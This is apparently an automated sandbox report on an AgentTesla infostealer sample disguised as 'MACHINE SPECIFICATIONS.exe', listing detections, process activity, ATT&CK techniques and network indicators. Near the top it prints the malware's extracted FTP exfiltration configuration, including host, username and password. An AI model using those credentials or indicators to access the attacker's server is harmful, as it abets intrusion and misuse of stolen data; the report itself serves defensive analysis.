Windows
Analysis Report
MACHINE SPECIFICATIONS.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- MACHINE SPECIFICATIONS.exe (PID: 6128 cmdline:
C:\Users\u ser\Deskto p\MACHINE SPECIFICAT IONS.exe MD5: 92945D0A2731EF771EA9D10C792E03E1) - CasPol.exe (PID: 688 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\CasP ol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
- newapp.exe (PID: 4272 cmdline:
"C:\Users\ user\AppDa ta\Roaming \newapp\ne wapp.exe" MD5: F866FC1C2E928779C7119353C3091F0C) - conhost.exe (PID: 4764 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- newapp.exe (PID: 676 cmdline:
"C:\Users\ user\AppDa ta\Roaming \newapp\ne wapp.exe" MD5: F866FC1C2E928779C7119353C3091F0C) - conhost.exe (PID: 6132 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cleanup
{"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.electrobist.com", "Username": "user1@electrobist.com", "Password": "w&oNc9e]pf~4"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security | ||
Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown |
| |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
Click to see the 4 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security | ||
MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen |
| |
Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown |
|
Timestamp: | 192.168.2.351.195.62.16049702212029927 11/29/22-11:20:12.397759 |
SID: | 2029927 |
Source Port: | 49702 |
Destination Port: | 21 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.351.195.62.16049703522592851779 11/29/22-11:20:12.420526 |
SID: | 2851779 |
Source Port: | 49703 |
Destination Port: | 52259 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Avira URL Cloud: |
Source: | Joe Sandbox ML: |
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | HTTP traffic detected: |
Source: | TCP traffic: |
Source: | FTP traffic detected: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | Windows user hook set: | Jump to behavior |
Source: | Window created: | Jump to behavior |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Large array initialization: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Code function: | 10_2_023FFC48 | |
Source: | Code function: | 10_2_023F6D20 | |
Source: | Code function: | 10_2_05DF9708 | |
Source: | Code function: | 10_2_05DFF2A0 | |
Source: | Code function: | 10_2_05DFBE50 | |
Source: | Code function: | 10_2_05DFB4E0 | |
Source: | Code function: | 10_2_05DF84B8 | |
Source: | Code function: | 10_2_05DF8408 | |
Source: | Code function: | 10_2_05DFD9A8 | |
Source: | Code function: | 10_2_05E90480 | |
Source: | Code function: | 10_2_05E92170 | |
Source: | Code function: | 10_2_05E9BC40 | |
Source: | Code function: | 10_2_05E95F40 | |
Source: | Code function: | 10_2_05E929C8 | |
Source: | Code function: | 10_2_05E92020 | |
Source: | Code function: | 10_2_05E9CA68 | |
Source: | Code function: | 10_2_05EE3D4C | |
Source: | Code function: | 10_2_05EE372C | |
Source: | Code function: | 10_2_05EE5668 | |
Source: | Code function: | 10_2_05EEC1E0 | |
Source: | Code function: | 10_2_05EE0040 | |
Source: | Code function: | 10_2_05EEC054 | |
Source: | Code function: | 10_2_05EE33E4 | |
Source: | Code function: | 10_2_05EED3A0 | |
Source: | Code function: | 10_2_05EE8B28 | |
Source: | Code function: | 10_2_05EE3730 | |
Source: | Code function: | 10_2_05E93958 | |
Source: | Code function: | 11_2_01130958 | |
Source: | Code function: | 13_2_00C00958 |
Source: | Static PE information: |
Source: | Binary or memory string: |
Source: | Dropped File: |
Source: | Static PE information: |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | Security API names: | ||
Source: | Security API names: | ||
Source: | Security API names: | ||
Source: | Security API names: |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 10_2_05DFE705 | |
Source: | Code function: | 10_2_05DF9C85 | |
Source: | Code function: | 10_2_05DF2A49 | |
Source: | Code function: | 10_2_05E951D5 | |
Source: | Code function: | 10_2_05E95225 |
Source: | Static PE information: |
Source: | File created: | Jump to dropped file |
Source: | Registry value created or modified: | Jump to behavior | ||
Source: | Registry value created or modified: | Jump to behavior |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | Icon embedded in binary file: |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | WMI Queries: |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | Process information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process token adjusted: | Jump to behavior |
Source: | Code function: | 10_2_05DF7BF0 |
Source: | Memory allocated: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Reference to suspicious API methods: | ||
Source: | Reference to suspicious API methods: | ||
Source: | Reference to suspicious API methods: |
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 211 Windows Management Instrumentation | 1 Registry Run Keys / Startup Folder | 211 Process Injection | 1 Disable or Modify Tools | 2 OS Credential Dumping | 114 System Information Discovery | Remote Services | 11 Archive Collected Data | 1 Exfiltration Over Alternative Protocol | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 Registry Run Keys / Startup Folder | 1 Deobfuscate/Decode Files or Information | 11 Input Capture | 111 Security Software Discovery | Remote Desktop Protocol | 2 Data from Local System | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | 1 Credentials in Registry | 1 Process Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 1 Non-Standard Port | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 3 Software Packing | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | 11 Input Capture | Scheduled Transfer | 2 Non-Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 11 Masquerading | LSA Secrets | 1 Application Window Discovery | SSH | 1 Clipboard Data | Data Transfer Size Limits | 23 Application Layer Protocol | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 131 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Remote System Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 211 Process Injection | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Hidden Files and Directories | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
59% | Virustotal | Browse | ||
73% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | TR/Spy.Gen8 | Download File |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
1% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
api.ipify.org.herokudns.com | 3.220.57.224 | true | false |
| unknown |
c-0001.c-msedge.net | 13.107.4.50 | true | false |
| unknown |
ftp.electrobist.com | 51.195.62.160 | true | true |
| unknown |
api.ipify.org | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| low | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
51.195.62.160 | ftp.electrobist.com | France | 16276 | OVHFR | true | |
3.220.57.224 | api.ipify.org.herokudns.com | United States | 14618 | AMAZON-AESUS | false |
IP |
---|
192.168.2.1 |
Joe Sandbox Version: | 36.0.0 Rainbow Opal |
Analysis ID: | 755960 |
Start date and time: | 2022-11-29 11:18:06 +01:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 9m 46s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | MACHINE SPECIFICATIONS.exe |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 20 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@7/5@3/3 |
EGA Information: |
|
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 67.27.158.254, 8.248.135.254, 8.241.123.126, 8.248.143.254, 67.27.157.254
- Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net
- Execution Graph export aborted for target newapp.exe, PID 4272 because it is empty
- Execution Graph export aborted for target newapp.exe, PID 676 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtAllocateVirtualMemory calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
11:19:57 | Autostart | |
11:20:05 | Autostart | |
11:20:12 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
51.195.62.160 | Get hash | malicious | Browse |
| |
3.220.57.224 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
api.ipify.org.herokudns.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
c-0001.c-msedge.net | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AMAZON-AESUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
OVHFR | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Roaming\newapp\newapp.exe | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MACHINE SPECIFICATIONS.exe.log
Download File
Process: | C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 654 |
Entropy (8bit): | 5.374391981354885 |
Encrypted: | false |
SSDEEP: | 12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhap+92n4MNQpN9tv:ML9E4KrgKDE4KGKN08AKh6+84xpNT |
MD5: | C8A62E39DE7A3F805D39384E8BABB1E0 |
SHA1: | B32B1257401F17A2D1D5D3CC1D8C1E072E3FEE31 |
SHA-256: | A7BC127854C5327ABD50C86000BF10586B556A5E085BB23523B07A15DD4C5383 |
SHA-512: | 7DB2825131F5CDA6AF33A179D9F7CD0A206FF34AE50D6E66DE9E99BE2CD1CB985B88C00F0EDE72BBC4467E7E42B5DC6132403AA2EC1A0A7A6D11766C438B10C3 |
Malicious: | true |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Users\user\AppData\Roaming\newapp\newapp.exe |
File Type: | |
Category: | modified |
Size (bytes): | 42 |
Entropy (8bit): | 4.0050635535766075 |
Encrypted: | false |
SSDEEP: | 3:QHXMKa/xwwUy:Q3La/xwQ |
MD5: | 84CFDB4B995B1DBF543B26B86C863ADC |
SHA1: | D2F47764908BF30036CF8248B9FF5541E2711FA2 |
SHA-256: | D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B |
SHA-512: | 485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 107624 |
Entropy (8bit): | 5.882571203162287 |
Encrypted: | false |
SSDEEP: | 1536:oSF7vA1hRqHixxMjlI34j8p2mdc/6A4vW/CU1RPMRVQJE:/A1hDPMip2mdcyA4vW/JRPMLQW |
MD5: | F866FC1C2E928779C7119353C3091F0C |
SHA1: | 70D06064E2F12CFB10A82BC985F86F58EA7A4138 |
SHA-256: | 67F3FC243C58EEAE55BDDC22CE025B7841A89ACA2E201B999D8C0E4F07D177B8 |
SHA-512: | B28B10801580726B85AB5F796EA26835648A3ACFBE1FBA95DFC687439B43FF9548BD3AB9EFC85D88FC071D232718BCFFAC614CC5BFF159173996A3D2AB22154D |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
Process: | C:\Users\user\AppData\Roaming\newapp\newapp.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 486 |
